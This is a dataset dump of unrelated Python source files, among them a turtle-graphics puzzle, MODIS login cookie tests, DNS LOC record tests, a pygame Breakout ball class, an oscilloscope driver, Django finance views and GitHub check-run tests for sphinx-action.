id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
3375638
|
"""Stage 5: Puzzle 4 of 10
Draw a triangle whose sides are all in different colors. Hint:
you'll have to figure out how far to turn by testing different
values for the `turn_right(degrees)` function. Note: we've added
`artist.random_color()` as well. Use it instead of a color to get
random colors. (`artist.random_colour()`,`artist.colour_random()`, and
`artist.color_random()` will also work.)
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level27')
a = artist
for count in range(3):
artist.color = artist.random_color()
a.move_forward(100)
a.turn_right(120)
# ???
artist.check()
|
StarcoderdataPython
|
1756809
|
import pytest
from datetime import datetime, timedelta
from modis_tools.auth import ModisSession, has_download_cookies
class TestModisSession:
def test_creates_session(self):
modis = ModisSession("test user", "test password")
assert modis.session
def test_no_credentials_raises_exception(self):
expected = Exception
with pytest.raises(expected):
modis = ModisSession()
class TestDownloadCookies:
@pytest.fixture()
def session_with_cookies(self):
modis = ModisSession("test user", "test password")
time = datetime.now() + timedelta(hours=9)
modis.session.cookies.set(
"urs_user_already_logged",
value="yes",
domain=".earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
modis.session.cookies.set(
"DATA", value="fake value,", domain="e4ftl01.cr.usgs.gov"
)
modis.session.cookies.set(
"_urs-gui_session",
value="fake value",
domain="urs.earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
return modis.session
def test_no_cookies_returns_false(self):
modis = ModisSession("test user", "test password")
expected = False
assert has_download_cookies(modis.session) == expected
def test_correct_cookies_return_true(self, session_with_cookies):
expected = True
assert has_download_cookies(session_with_cookies) == expected
def test_expired_first_cookie_return_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=-9)
session_with_cookies.cookies.set(
"urs_user_already_logged",
value="yes",
domain=".earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_expired_gui_cookie_return_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=-9)
session_with_cookies.cookies.set(
"_urs-gui_session",
value="fake value",
domain="urs.earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_incorrect_earthdata_domain_return_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=9)
session_with_cookies.cookies.set(
"urs_user_already_logged",
value="yes",
domain="wrong.url",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_logged_in_value_no_returns_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=9)
session_with_cookies.cookies.set(
"urs_user_already_logged",
value="no",
domain=".earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_incorrect_data_domain_returns_false(self, session_with_cookies):
session_with_cookies.cookies.set(
"DATA", value="fake value,", domain="wrong.url"
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_incorrect_gui_domain_returns_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=9)
session_with_cookies.cookies.set(
"_urs-gui_session",
value="fake value",
domain="wrong.url",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
|
StarcoderdataPython
|
4803105
|
__author__ = '<NAME>'
'''
https://codeforces.com/problemset/problem/688/B
Solution: If we observe the first few palindromes of even length, for the first 9 palindromes,
we get 11 to 99. After that, we go to 1001 and then put these 11 to 99 between two 1s. This results in
palindromes 1111, 1221, 1331 to 1991. If we observe the behavior, we see that this progression is like
the natural numbers. So the 5th such palindrome is 55, 9th is 99, 10th is 1001, 15th is 1551. Hence the
palindrome can be obtained by suffixing n with its reverse.
Since we want to reverse n, it makes sense to keep the input in string itself.
'''
def solve(n):
return n + ''.join(reversed(n))
if __name__ == "__main__":
n = raw_input()
print solve(n)
|
StarcoderdataPython
|
52290
|
<gh_stars>1-10
"""
Python script to print all zendesk domain articles as a single entity. Useful for checking global
formatting properties or your articles.
N.B. this python app currently does not have a wrapper script.
"""
import sys
from zendesk.api import DomainConfiguration
from zendesk.api import HelpCenter
from zendesk.formatter import format_tags_local
def main(sub_domain):
config = DomainConfiguration(sub_domain)
hc = HelpCenter(config)
for category in hc.get_categories():
for section in category.get_sections():
for article in section.get_articles():
# XXX This could probably be improved to be prettier.
print('<a name="%i"></a><h2>%s</h2>' % (article.get_id(), article.get_name()))
print(format_tags_local(config, article.get_body()))
print('<p style="page-break-after:always;"></p>')
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: python %s <zendesk_sub_domain>' % sys.argv[0])
else:
main(sys.argv[1])
|
StarcoderdataPython
|
3363069
|
# Copyright (C) 2014 Red Hat, Inc.
# Author: <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED 'AS IS' AND RED HAT DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
try:
import unittest2 as unittest
except ImportError:
import unittest
import dns.rrset
import dns.rdtypes.ANY.LOC
class RdtypeAnyLocTestCase(unittest.TestCase):
def testEqual1(self):
'''Test default values for size, horizontal and vertical precision.'''
r1 = dns.rrset.from_text('foo', 300, 'IN', 'LOC',
'49 11 42.400 N 16 36 29.600 E 227.64m')
r2 = dns.rrset.from_text('FOO', 600, 'in', 'loc',
'49 11 42.400 N 16 36 29.600 E 227.64m '
'1.00m 10000.00m 10.00m')
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
def testEqual2(self):
'''Test default values for size, horizontal and vertical precision.'''
r1 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1),
22764.0) # centimeters
r2 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1),
22764.0, # centimeters
100.0, 1000000.00, 1000.0) # centimeters
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
def testEqual3(self):
'''Test size, horizontal and vertical precision parsers: 100 cm == 1 m.
Parsers in from_text() and __init__() have to produce equal results.'''
r1 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1), 22764.0,
200.0, 1000.00, 200.0) # centimeters
r2 = dns.rrset.from_text('FOO', 600, 'in', 'loc',
'49 11 42.400 N 16 36 29.600 E 227.64m '
'2.00m 10.00m 2.00m')[0]
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
def testEqual4(self):
'''Test size, horizontal and vertical precision parsers without unit.
Parsers in from_text() and __init__() have produce equal result
for values with and without trailing "m".'''
r1 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1), 22764.0,
200.0, 1000.00, 200.0) # centimeters
r2 = dns.rrset.from_text('FOO', 600, 'in', 'loc',
'49 11 42.400 N 16 36 29.600 E 227.64 '
'2 10 2')[0] # meters without explicit unit
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
168219
|
<reponame>gecco-evojax/evojax
# Copyright 2022 The EvoJAX Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC
from abc import abstractmethod
import jax.numpy as jnp
class PolicyNetwork(ABC):
"""Interface for all policy networks in EvoJAX."""
num_params: int
@abstractmethod
def get_actions(self,
vec_obs: jnp.ndarray,
params: jnp.ndarray) -> jnp.ndarray:
"""Get vectorized actions for the corresponding (obs, params) pair.
Args:
vec_obs - Vectorized observations of shape (num_envs, *obs_shape).
params - A batch of parameters, shape is (num_envs, param_size).
Returns:
jnp.ndarray. Vectorized actions.
"""
raise NotImplementedError()
|
StarcoderdataPython
|
50730
|
# This file is part of comma, a generic and flexible library
# Copyright (c) 2011 The University of Sydney
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the University of Sydney nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE
# GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT
# HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
MAX_HELP_POSITION = 50
BASE_FORMATTER = argparse.RawTextHelpFormatter
class patched_formatter(BASE_FORMATTER):
def __init__(self, prog):
super(patched_formatter, self).__init__(prog, max_help_position=MAX_HELP_POSITION)
def _format_action_invocation(self, action):
if not action.option_strings or action.nargs == 0:
return super(patched_formatter, self)._format_action_invocation(action)
default = action.dest.upper()
args_string = self._format_args(action, default)
return ', '.join(action.option_strings) + ' ' + args_string
def _format_action(self, action):
return ''.join([' '*4,
self._format_action_invocation(action),
': ',
self._expand_help(action),
'\n'])
def can_be_patched(base_formatter):
try:
getattr(base_formatter, '_format_action_invocation')
getattr(base_formatter, '_format_args')
getattr(base_formatter, '_format_action')
getattr(base_formatter, '_expand_help')
return True
except AttributeError:
return False
def argparse_fmt(prog):
"""
use this funciton as formatter_class in argparse.ArgumentParser
"""
if can_be_patched(BASE_FORMATTER):
return patched_formatter(prog)
else:
return BASE_FORMATTER(prog, max_help_position=MAX_HELP_POSITION)
|
StarcoderdataPython
|
3215001
|
import pygame, math
from engine import Engine
from eventManager import Events
from brick import *
from paddle import *
class Ball(Engine.GUI.Widget):
def __init__(self, level):
super().__init__()
self.level = level
self.eventManager = EventManager()
self.radius = self.options.ballRadius
self.vector = self.options.ballVectorInitial
self.gyreDirection = self.options.ballGyreDirection
self.speed = self.options.ballSpeed
self.color = self.options.ballColor
self.pauseForTicks = 0
self.repositionWhilePausedAfterTicks = 0
# puting these here as these may be needed
self.width = self.options.ballRadius * 2
self.height = self.width
self.x = self.options.ballInitialPosition[0]
self.y = self.options.ballInitialPosition[1]
# making a square ball for now
self.image = pygame.Surface((self.options.ballRadius * 2, self.options.ballRadius * 2))
self.image.fill(self.color)
self.rect = self.image.get_rect()
self.rect.x = - self.radius
self.rect.y = self.options.ballInitialPosition[1] - self.radius
self.group = pygame.sprite.GroupSingle()
self.group.add(self)
self.soundBallBounce = pygame.mixer.Sound(self.options.soundBallBounce)
self.soundVolumeBallBounce = self.options.soundVolumeBallBounce
def update(self):
x = self.rect.x
y = self.rect.y
self.width = self.options.ballRadius * 2
self.height = self.width
self.image = pygame.Surface((self.options.ballRadius * 2, self.options.ballRadius * 2))
self.image.fill(self.color)
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
def addListeners(self,):
event = Events.TickEvent()
self.eventManager.addListener(event, self)
def notify(self, event):
if isinstance(event, Events.TickEvent):
if self.pauseForTicks > 0:
self.pauseForTicks -= 1
if self.pauseForTicks == self.repositionWhilePausedAfterTicks:
self.move(0)
else:
# reposition ball and check for collisions
self.move(self.speed)
self.checkForCollisions()
def handleOverlap(self, xOverlap, yOverlap, isPaddle):
# figure out which overlap is further into the brick with an edge case of equally
overlap = 0
normalAxis = 180 # default to top/bottom collisions
if not isPaddle:
# sanity check for overlap as it should never be greater than the speed of the ball
# this is invalid for paddle collisions as the paddle moves independently of the ball at it's own rate
if xOverlap > self.speed:
xOverlap = 0 # ignore overlap
if yOverlap > self.speed:
yOverlap = 0 # ignore overlap
else:
xOverlap = 0 # it's the paddle, so we only care about the yOverlap if it exists
if yOverlap > xOverlap: # collision likely came from top/bottom
overlap = yOverlap
elif xOverlap > yOverlap: # collsions likely came from left/right
overlap = xOverlap
normalAxis = 360 # change normal axis to vertical
else: # edge case of equal, so which one doesn't matter
overlap = xOverlap
self.move(overlap * -1, assureMovement = True) # move ball back along vector to the last edge passed
return normalAxis
def bounce(self, bounces, normalAxis, collidableObjects, isPaddle = False, spin = None):
# recheck position and move ball outside of (or to the edge of) the collision zone to prevent multiple bounces on the same object per hit
# otherwise vectors can get messed up as the ball bounces off the object going into it and then again (and again and again, etc.)
# while exiting the collision zone
normals = []
# play sound
if self.options.soundPlayBallBounce:
self.soundBallBounce.play()
if self.leftEdge() < self.options.levelZoneGamePlay["x"]:
self.x = self.options.levelZoneGamePlay["x"] # left edge is past window, clamp to left edge of window
if self.rightEdge() > self.options.levelZoneGamePlay["x"] + self.options.levelZoneGamePlay["width"]:
self.x = (self.options.levelZoneGamePlay["x"] + self.options.levelZoneGamePlay["width"]) - self.rect.width # right edge is past window, clamp to right edge of window
if self.topEdge() < self.options.levelZoneGamePlay["y"]:
self.y = self.options.levelZoneGamePlay["y"] # top edge is past window, clamp to top edge of window
if self.bottomEdge() > self.options.levelZoneGamePlay["y"] + self.options.levelZoneGamePlay["height"]:
self.y = (self.options.levelZoneGamePlay["y"] + self.options.levelZoneGamePlay["height"]) - self.rect.height # bottom edge is past window, clamp to bottom edge of window
# now do the same for the bricks and the paddle (both of which are collidable objects)
for co in collidableObjects:
if co.rect.collidepoint(self.rect.topleft):
# topleft is within the collidable object
xOverlap = abs(co.rightEdge() - self.leftEdge())
yOverlap = abs(co.bottomEdge() - self.topEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
if co.rect.collidepoint(self.rect.topright):
# topright is within the collidable object
xOverlap = abs(co.leftEdge() - self.rightEdge())
yOverlap = abs(co.bottomEdge() - self.topEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
if co.rect.collidepoint(self.rect.bottomright):
# bottomright is within the collidable object
xOverlap = abs(co.leftEdge() - self.rightEdge())
yOverlap = abs(co.topEdge() - self.bottomEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
if co.rect.collidepoint(self.rect.bottomleft):
# bottomleft is within the collidable object
xOverlap = abs(co.rightEdge() - self.leftEdge())
yOverlap = abs(co.topEdge() - self.bottomEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
co.collide() # may as well notify the object of a collision here so we don't have to loop through twice
# finally, change vector, angle of incidence = angle of reflection, may need to change rotation (counter/clockwise) on paddle hit or ball spin
if len(normals) > 0: # multiple bounces passed in, bounce once prioritizing vertical travel
normalAxis = max(normals)
# angle of incidence... yadda yadda...
reflectionVector = (normalAxis - self.vector)
# change gyre direction if needed
reflectionVector -= self.gyreDirection #(0 or 180)
# keep the angles sane (i.e., between 0 and 359)
reflectionVector %= 360
# update to new vector
self.vector = reflectionVector
def checkForCollisions(self):
# intialize variables here to count brick/paddle bounces as python does not support variable hoisting
bounces = 0
collidableObjects = pygame.sprite.Group()
# check for boundary collisions
if self.topEdge() <= self.options.levelZoneGamePlay["y"]:
self.bounce(1, 180, collidableObjects)
if self.rightEdge() >= self.options.levelZoneGamePlay["x"] + self.options.levelZoneGamePlay["width"]:
self.bounce(1, 360, collidableObjects)
if self.bottomEdge() >= self.options.levelZoneGamePlay["y"] + self.options.levelZoneGamePlay["height"]: # bottom was hit, lose a ball
# reset to intial position and vector
self.x = self.options.ballInitialPosition[0]
self.y = self.options.ballInitialPosition[1]
self.vector = self.options.ballVectorInitial
self.pauseForTicks = 60
event = Events.StatUpdateEvent(stat = Engine.Stats.BALLS_REMAINING, value = -1)
self.eventManager.post(event)
if self.leftEdge() <= self.options.levelZoneGamePlay["x"]:
self.bounce(1, 360, collidableObjects)
#check for bricks
collidableObjects.add(self.level.getWidgets(Brick))
collidableObjects = pygame.sprite.groupcollide(collidableObjects, self.group, False, False) #redfine collidableObjects to include only those Bricks that were collided with
bounces += len(collidableObjects)
if bounces > 0:
self.bounce(bounces, 180, collidableObjects)
# redfine as a new group to remove all sprites from this group and redefine it as a actual group as groupcollide returns a dict
collidableObjects = pygame.sprite.Group()
# reset bounces
bounces = 0
# check for paddle
collidableObjects.add(self.level.getWidgets(Paddle))
collidableObjects = pygame.sprite.groupcollide(collidableObjects, self.group, False, False) #redfine collidableObjects to include only those Paddles that were collided with
bounces += len(collidableObjects)
if bounces > 0:
for paddle in collidableObjects: # should only be one, but this allows for multiple paddles later if we want to do that sort of thing
self.bottomEdge(paddle.topEdge()) # always set the bottom edge of the ball to the top edge of the paddle
paddle.redirect(self) # set the new vector
if self.options.soundPlayBallBounce:
self.soundBallBounce.play() # and play sound
def move(self, distance, assureMovement = None):
if assureMovement == None:
assureMovement = self.options.difficulty == 0
vector = math.radians(self.vector)
dx = distance * math.cos(vector)
dy = distance * math.sin(vector)
if assureMovement:
if 0 < abs(dx) < 1:
sign = dx / abs(dx)
dx = 1 * sign
if 0 < abs(dy) < 1:
sign = dy / abs(dy)
dy = 1 * sign
# this will keep track of x,y seperately and account for fractional pixel movement
self.x += dx
self.y += dy
# assigning a fractional value to a pygame.Rect will apparently truncate the fraction, hence the need for separate storage above
self.rect.x = self.x
self.rect.y = self.y
|
StarcoderdataPython
|
4811953
|
<reponame>kynan/lightlab<gh_stars>1-10
from . import VISAInstrumentDriver
from lightlab.equipment.abstract_drivers import TekScopeAbstract
from lightlab.laboratory.instruments import Oscilloscope
class Tektronix_TDS6154C_Oscope(VISAInstrumentDriver, TekScopeAbstract):
''' Real time scope.
See abstract driver for description.
`Manual <http://www.tek.com/sites/tek.com/files/media/media/resources/55W_14873_9.pdf>`__
Usage: :any:`/ipynbs/Hardware/Oscilloscope.ipynb`
'''
instrument_category = Oscilloscope
totalChans = 4
# Similar to the DSA, except
_recLenParam = 'HORIZONTAL:RECORDLENGTH' # this is different from DSA
_clearBeforeAcquire = True
_measurementSourceParam = 'SOURCE1:WFM'
_runModeParam = 'ACQUIRE:STOPAFTER:MODE'
_runModeSingleShot = 'CONDITION'
_yScaleParam = 'YMULT' # this is different from DSA
def __init__(self, name='The TDS scope', address=None, **kwargs):
VISAInstrumentDriver.__init__(self, name=name, address=address, **kwargs)
TekScopeAbstract.__init__(self)
def __setupSingleShot(self, isSampling, forcing=False):
''' Additional DSA things needed to put it in the right mode.
If it is not sampling, the trigger source should always be external
'''
super()._setupSingleShot(isSampling, forcing)
self.setConfigParam('ACQUIRE:STOPAFTER:CONDITION',
'ACQWFMS' if isSampling else'AVGCOMP',
forceHardware=forcing)
if isSampling:
self.setConfigParam('ACQUIRE:STOPAFTER:COUNT', '1', forceHardware=forcing)
if not isSampling:
self.setConfigParam('TRIGGER:SOURCE', 'EXTDIRECT', forceHardware=forcing)
|
StarcoderdataPython
|
1739539
|
<filename>{{cookiecutter.project_directory}}/{{cookiecutter.main_package_name}}/config.py<gh_stars>1-10
"""Application configuration."""
import logging
import os
class Config(object):
"""Base configuration."""
SECRET_KEY = os.environ.get('{{cookiecutter.main_package_name | upper}}_SECRET', 'default-secret-key')
class DevelopmentConfig(Config):
"""Development configuration."""
ENV = 'development'
DEBUG = True
LOG_LEVEL = logging.DEBUG
class TestingConfig(Config):
"""Test configuration."""
ENV = 'testing'
DEBUG = True
TESTING = True
LOG_LEVEL = logging.DEBUG
class ProductionConfig(Config):
"""Production configuration."""
ENV = 'production'
DEBUG = False
TESTING = False
URL_PREFIX = os.environ.get('{{ cookiecutter.main_package_name | upper}}_URL_PREFIX',
'/{{ cookiecutter.main_package_name | lower }}')
LOG_LEVEL = logging.WARNING
|
StarcoderdataPython
|
24065
|
<reponame>su226/IdhagnBot
from typing import Any
from .. import util
FORMAT = '''\
🤔 {username} 发布了……一些东西
https://t.bilibili.com/{id}
目前机器人还不能理解这个qwq'''
def handle(content: Any) -> str:
return FORMAT.format(
username=content["desc"]["user_profile"]["info"]["uname"],
id=content["desc"]["dynamic_id_str"])
|
StarcoderdataPython
|
3275654
|
import sys
sys.path.append( '..' )
from PyRTF import *
def MergedCells( ) :
# another test for the merging of cells in a document
doc = Document()
section = Section()
doc.Sections.append( section )
# create the table that will get used for all of the "bordered" content
col1 = 1000
col2 = 1000
col3 = 1000
col4 = 2000
section.append( 'Table Two' )
table = Table( col1, col2, col3 )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two' ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', span=2 ) )
table.AddRow( Cell( 'A-one', span=3 ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two' ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one', span=2 ), Cell( 'A-two' ) )
section.append( table )
section.append( 'Table Two' )
table = Table( col1, col2, col3 )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', start_vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( Paragraph( ParagraphPropertySet( alignment=ParagraphPropertySet.CENTER ), 'SPREAD' ),
span=3 ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', start_vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
section.append( table )
#
section.append( 'Table Three' )
table = Table( col1, col2, col3, col4 )
table.AddRow( Cell( 'This is pretty amazing', flow=Cell.FLOW_LR_BT, start_vertical_merge=True ),
Cell( 'one' ), Cell( 'two' ), Cell( 'three' ) )
for i in range( 10 ) :
table.AddRow( Cell( vertical_merge=True ),
Cell( 'one' ), Cell( 'two' ), Cell( 'three' ) )
section.append( table )
section.append( 'Table Four' )
table = Table( col4, col1, col2, col3 )
table.AddRow( Cell( 'one' ), Cell( 'two' ), Cell( 'three' ),
Cell( 'This is pretty amazing', flow=Cell.FLOW_RL_TB, start_vertical_merge=True ) )
for i in range( 10 ) :
table.AddRow( Cell( 'one' ), Cell( 'two' ), Cell( 'three' ),
Cell( vertical_merge=True ))
section.append( table )
return doc
if __name__ == '__main__' :
renderer = Renderer()
renderer.Write( MergedCells(), file( 'MergedCells.rtf', 'w' ) )
print "Finished"
|
StarcoderdataPython
|
3362558
|
from django.contrib import messages
from django.utils.safestring import mark_safe
from django.shortcuts import HttpResponseRedirect
from django.core.urlresolvers import reverse
from smartmin.views import SmartCRUDL, SmartCreateView, SmartListView
from .models import Transaction, Category
class CategoryCRUDL(SmartCRUDL):
model = Category
class Create(SmartCreateView):
def get_success_url(self):
animal_id = self.request.session.get('animal_id', None)
return reverse('finances.transaction_create') + '?animal=' + animal_id
class TransactionCRUDL(SmartCRUDL):
model = Transaction
class FormMixin(object):
def __init__(self, **kwargs):
from .forms import TransactionForm
self.form_class = TransactionForm
super(TransactionCRUDL.FormMixin, self).__init__(**kwargs)
class Create(FormMixin, SmartCreateView):
fields = ('transaction_type', 'category', 'date', 'amount', )
field_config = {
'transaction_type': (dict(label='Type')),
'category': dict(help=mark_safe('<a href="/finances/category/create/">Click here</a> to add new category')),
}
def get(self, request, *args, **kwargs):
animal_id = request.GET.get('animal', None)
group_id = request.GET.get('group', None)
request.session['animal_id'] = animal_id
if not animal_id and not group_id:
messages.warning(request, 'Animal Id or group Id is required')
return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
return super(TransactionCRUDL.Create, self).get(request, *args, **kwargs)
def get_success_url(self):
return reverse('animals.animal_read', args=[self.request.GET.get('animal', None)])
class List(SmartListView):
fields = ('id', 'date', 'transaction_type', 'category', 'amount', )
field_config = {
'transaction_type': (dict(label='Type')),
}
def get_queryset(self, **kwargs):
queryset = super(TransactionCRUDL.List, self).get_queryset(**kwargs)
queryset = queryset.order_by('-id')
return queryset
|
StarcoderdataPython
|
3387096
|
import json
import requests
import unittest
from unittest import mock
from sphinx_action import status_check
class TestStatusChecks(unittest.TestCase):
@mock.patch('sphinx_action.status_check.requests.post')
def test_create_check(self, mock_post):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_response.json = mock.Mock(return_value=create_response)
mock_post.return_value = mock_response
id = status_check.create_in_progress_status_check(
'SecretToken', 'sha_hash', 'ammaraskar/sphinx-action'
)
self.assertEqual(id, 4)
mock_post.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs',
headers={
'Authorization': 'Bearer SecretToken',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'name': 'Sphinx Check',
'head_sha': 'sha_hash',
'status': 'in_progress',
'started_at': mock.ANY
}
)
@mock.patch('sphinx_action.status_check.requests.patch')
def test_finish_status_check_in_progress(self, mock_patch):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_patch.return_value = mock_response
check_output = status_check.CheckOutput(
title='Test Check', summary='Test In Progress', annotations=[]
)
status_check.update_status_check(
id=23, github_token='<PASSWORD>',
repo='ammaraskar/sphinx-action', check_output=check_output
)
mock_patch.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs/23', # noqa
headers={
'Authorization': 'Bearer Secret<PASSWORD>',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'output': {
'title': 'Test Check',
'summary': 'Test In Progress',
'annotations': []
}
}
)
@mock.patch('sphinx_action.status_check.requests.patch')
def test_finish_status_check_success(self, mock_patch):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_patch.return_value = mock_response
check_output = status_check.CheckOutput(
title='Test Check', summary='Test Finished', annotations=[]
)
status_check.update_status_check(
id=9, conclusion=status_check.StatusConclusion.SUCCESS,
github_token='<PASSWORD>', repo='ammaraskar/sphinx-action',
check_output=check_output
)
mock_patch.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs/9', # noqa
headers={
'Authorization': 'Bearer <PASSWORD>Token2',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'status': 'completed',
'completed_at': mock.ANY,
'conclusion': 'success',
'output': {
'title': 'Test Check',
'summary': 'Test Finished',
'annotations': []
}
}
)
@mock.patch('sphinx_action.status_check.requests.patch')
def test_finish_status_check_fail(self, mock_patch):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_patch.return_value = mock_response
annotations = [
status_check.CheckAnnotation(
path='Doc/using/index.rst', start_line=3, end_line=3,
annotation_level=status_check.AnnotationLevel.WARNING,
message='Unexpected section title.'
),
status_check.CheckAnnotation(
path='Doc/distutils/disclaimer.rst', start_line=1, end_line=1,
annotation_level=status_check.AnnotationLevel.FAILURE,
message=':ref:`asdf` not found.'
)
]
check_output = status_check.CheckOutput(
title='Test Check', summary='Test Failed', annotations=annotations
)
status_check.update_status_check(
id=32, conclusion=status_check.StatusConclusion.FAILURE,
github_token='<PASSWORD>', repo='ammaraskar/sphinx-action',
check_output=check_output
)
mock_patch.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs/32', # noqa
headers={
'Authorization': 'Bearer <PASSWORD>',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'completed_at': mock.ANY,
'conclusion': 'failure',
'status': 'completed',
'output': {
'title': 'Test Check',
'summary': 'Test Failed',
'annotations': [
{
'path': 'Doc/using/index.rst',
'start_line': 3, 'end_line': 3,
'annotation_level': 'warning',
'message': 'Unexpected section title.'
},
{
'path': 'Doc/distutils/disclaimer.rst',
'start_line': 1, 'end_line': 1,
'annotation_level': 'failure',
'message': ':ref:`asdf` not found.'
}
]
}
}
)
